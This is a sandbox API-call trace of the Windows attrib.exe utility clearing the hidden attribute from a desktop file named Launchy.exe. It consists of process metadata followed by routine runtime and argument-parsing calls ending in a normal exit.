image_name = "attrib.exe" filename = "c:\\windows\\syswow64\\attrib.exe" page_root = "0x2b77d000" os_pid = "0x25c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x1064" cmd_line = "attrib -h \"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 591 os_tid = 0xe54 [0266.982] GetModuleHandleA (lpModuleName=0x0) returned 0x12a0000 [0266.982] __set_app_type (_Type=0x1) [0266.983] __p__fmode () returned 0x776f3c14 [0266.983] __p__commode () returned 0x776f49ec [0266.983] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a3210) returned 0x0 [0266.983] __getmainargs (in: _Argc=0x12a4018, _Argv=0x12a401c, _Env=0x12a4020, _DoWildCard=0, _StartInfo=0x12a402c | out: _Argc=0x12a4018, _Argv=0x12a401c, _Env=0x12a4020) returned 0 [0266.983] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0266.983] RtlAllocateHeap (HeapHandle=0x910000, Flags=0x0, Size=0x4) returned 0x91b058 [0266.983] ??0CLASS_DESCRIPTOR@@QAE@XZ () returned 0x91b058 [0266.983] ?Initialize@CLASS_DESCRIPTOR@@QAEEPBD@Z () returned 0x91b001 [0266.983] ??0PROGRAM@@IAE@XZ () returned 0x6af178 [0266.983] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af200 [0266.983] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af230 [0266.983] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af260 [0266.983] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af290 [0266.983] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af2c0 [0266.983] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af2f0 [0266.983] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af320 [0266.983] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af350 [0266.983] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af380 [0266.983] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af3b0 [0266.984] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af3e0 [0266.984] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af410 [0266.984] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af440 [0266.984] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af470 [0266.984] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af4a0 [0266.984] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af4d0 [0266.984] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af500 [0266.984] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af530 [0266.984] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af560 [0266.984] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af590 [0266.984] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af5c0 [0266.984] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af5f0 [0266.984] ??0PATH_ARGUMENT@@QAE@XZ () returned 0x6af620 [0266.984] ??0FSN_FILTER@@QAE@XZ () returned 0x6af654 [0266.984] ??0FSN_FILTER@@QAE@XZ () returned 0x6af6f4 [0266.984] ??0STREAM_MESSAGE@@QAE@XZ () returned 0x6af798 [0266.984] ??0PATH@@QAE@XZ () returned 0x6af800 [0266.984] ??0DSTRING@@QAE@XZ () returned 0x6afa50 [0266.984] ??0ARGUMENT_LEXEMIZER@@QAE@XZ () returned 0x6aea88 [0266.984] ??0ARRAY@@QAE@XZ () returned 0x6aec54 [0266.984] ??0ARRAY@@QAE@XZ () returned 0x6aec9c [0266.984] ??0STRING_ARGUMENT@@QAE@XZ () returned 0x6aeb8c [0266.984] ??0PATH@@QAE@XZ () returned 0x6aef10 [0266.984] ??0DSTRING@@QAE@XZ () returned 0x6aec6c [0266.984] ??0PATH@@QAE@XZ () returned 0x6aecc8 [0266.984] ??0DSTRING@@QAE@XZ () returned 0x6aec3c [0266.984] ??0STRING_ARGUMENT@@QAE@XZ () returned 0x6aebe4 [0266.984] ??0STRING_ARGUMENT@@QAE@XZ () returned 0x6aec10 [0266.984] ??0STRING_ARGUMENT@@QAE@XZ () returned 0x6aebb8 [0266.984] ??0DSTRING@@QAE@XZ () returned 0x6aec84 [0266.985] Get_Standard_Output_Stream () returned 0x910568 [0266.985] Get_Standard_Input_Stream () returned 0x910518 [0266.985] ?Initialize@STREAM_MESSAGE@@QAEEPAVSTREAM@@00@Z () returned 0x1 [0267.002] ?Initialize@WSTRING@@QAEEPBGK@Z () returned 0x91ae01 [0267.002] ?Initialize@ARRAY@@QAEEKK@Z () returned 0x1 [0267.002] ?Initialize@ARGUMENT_LEXEMIZER@@QAEEPAVARRAY@@@Z () returned 0x91af01 [0267.002] ?PutSwitches@ARGUMENT_LEXEMIZER@@QAEXPBD@Z () returned 0x91af01 [0267.002] ?SetCaseSensitive@ARGUMENT_LEXEMIZER@@QAEXE@Z () returned 0x91af00 [0267.002] ?Initialize@WSTRING@@QAEEPBDK@Z () returned 0x91af01 [0267.002] ?Initialize@WSTRING@@QAEEPBDK@Z () returned 0x91af01 [0267.002] ?PutSeparators@ARGUMENT_LEXEMIZER@@QAEXPBD@Z () returned 0x91af01 [0267.002] ?PrepareToParse@ARGUMENT_LEXEMIZER@@QAEEPAVWSTRING@@@Z () returned 0xffffff01 [0267.002] ?Initialize@ARRAY@@QAEEKK@Z () returned 0x1 [0267.003] ?Initialize@LONG_ARGUMENT@@QAEEPAD@Z () returned 0x91af01 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91af01 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91af01 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91af01 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91ae01 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91af01 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91af01 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91af01 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91b101 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91b101 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91b101 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91b201 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91b101 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91b001 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91b001 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91b201 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91b101 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91b101 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91b101 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91b001 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91b001 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91b101 [0267.003] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x91b101 [0267.003] ?Initialize@LONG_ARGUMENT@@QAEEPAD@Z () returned 0x91b101 [0267.003] ?Initialize@LONG_ARGUMENT@@QAEEPAD@Z () returned 0x91b201 [0267.003] ?Initialize@LONG_ARGUMENT@@QAEEPAD@Z () returned 0x91b201 [0267.003] ?Initialize@PATH_ARGUMENT@@QAEEPADE@Z () returned 0x91b001 [0267.003] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6aeb01 [0267.003] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af201 [0267.003] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af201 [0267.003] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af201 [0267.003] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af201 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af201 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af201 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af301 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af301 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af301 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af301 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af401 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af301 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af401 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af401 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af401 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af401 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af501 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af501 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af501 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af501 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af501 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af501 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6aeb01 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6aec01 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6aeb01 [0267.004] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af601 [0267.004] ?DoParsing@ARGUMENT_LEXEMIZER@@QAEEPAVARRAY@@@Z () returned 0x1 [0267.004] ?IsValueSet@ARGUMENT@@QAEEXZ () returned 0x0 [0267.004] ?IsValueSet@ARGUMENT@@QAEEXZ () returned 0x0 [0267.004] ?IsValueSet@ARGUMENT@@QAEEXZ () returned 0x0 [0267.004] ?IsValueSet@ARGUMENT@@QAEEXZ () returned 0xffefff01 [0267.004] ?Initialize@PATH@@QAEEPBVWSTRING@@E@Z () returned 0x6af801 [0267.004] ?QueryString@WSTRING@@QBEPAV1@KK@Z () returned 0x91e388 [0267.004] ?Initialize@PATH@@QAEEPBVWSTRING@@E@Z () returned 0x6aef01 [0267.005] ?IsDrive@PATH@@QBEEXZ () returned 0x0 [0267.005] ?QueryDirectory@SYSTEM@@SGPAVFSN_DIRECTORY@@PBVPATH@@E@Z () returned 0x91e960 [0267.005] ?Initialize@FSN_FILTER@@QAEEXZ () returned 0x1 [0267.005] ?SetFileName@FSN_FILTER@@QAEEPBD@Z () returned 0x91b001 [0267.005] ?SetAttributes@FSN_FILTER@@QAEEKKK@Z () returned 0x1 [0267.005] ?QueryString@WSTRING@@QBEPAV1@KK@Z () returned 0x91e388 [0267.005] ?Strchr@WSTRING@@QBEKGK@Z () returned 0xffffffff [0267.005] ?Strchr@WSTRING@@QBEKGK@Z () returned 0xffffffff [0267.005] ?Initialize@FSN_FILTER@@QAEEXZ () returned 0x1 [0267.005] ?SetFileName@FSN_FILTER@@QAEEPBVWSTRING@@@Z () returned 0x91f001 [0267.005] ?SetAttributes@FSN_FILTER@@QAEEKKK@Z () returned 0x1 [0267.005] ?DeleteAllMembers@ARRAY@@UAEEXZ () returned 0x91dc01 [0267.006] ??1DSTRING@@UAE@XZ () returned 0x91dc01 [0267.006] ??1STRING_ARGUMENT@@UAE@XZ () returned 0x1 [0267.006] ??1STRING_ARGUMENT@@UAE@XZ () returned 0x1 [0267.006] ??1STRING_ARGUMENT@@UAE@XZ () returned 0x1 [0267.006] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.006] ??1PATH@@UAE@XZ () returned 0x1 [0267.006] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.006] ??1PATH@@UAE@XZ () returned 0x1 [0267.006] ??1STRING_ARGUMENT@@UAE@XZ () returned 0x1 [0267.006] ??1ARRAY@@UAE@XZ () returned 0x1 [0267.006] ??1ARRAY@@UAE@XZ () returned 0x1 [0267.006] ??1ARGUMENT_LEXEMIZER@@UAE@XZ () returned 0x1 [0267.006] ?QueryFsnodeArray@FSN_DIRECTORY@@QBEPAVARRAY@@PAVFSN_FILTER@@@Z () returned 0x91f110 [0267.006] ?QueryIterator@ARRAY@@UBEPAVITERATOR@@XZ () returned 0x915b60 [0267.007] ?SetAttributes@FSNODE@@QAEEKPAK@Z () returned 0x1 [0267.007] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.007] ??1PATH@@UAE@XZ () returned 0x1 [0267.007] ??1STREAM_MESSAGE@@UAE@XZ () returned 0x73f61248 [0267.007] ??1FSN_FILTER@@UAE@XZ () returned 0x1 [0267.007] ??1FSN_FILTER@@UAE@XZ () returned 0x1 [0267.007] ??1PATH_ARGUMENT@@UAE@XZ () returned 0x1 [0267.007] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.007] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.007] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.007] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.007] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.008] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.009] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.009] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.009] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.009] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.009] ??1DSTRING@@UAE@XZ () returned 0x1 [0267.009] ??1BSTRING@@UAE@XZ () returned 0x1 [0267.009] ??1PROGRAM@@UAE@XZ () returned 0x73f61248 [0267.009] exit (_Code=0) Thread: id = 593 os_tid = 0x5b8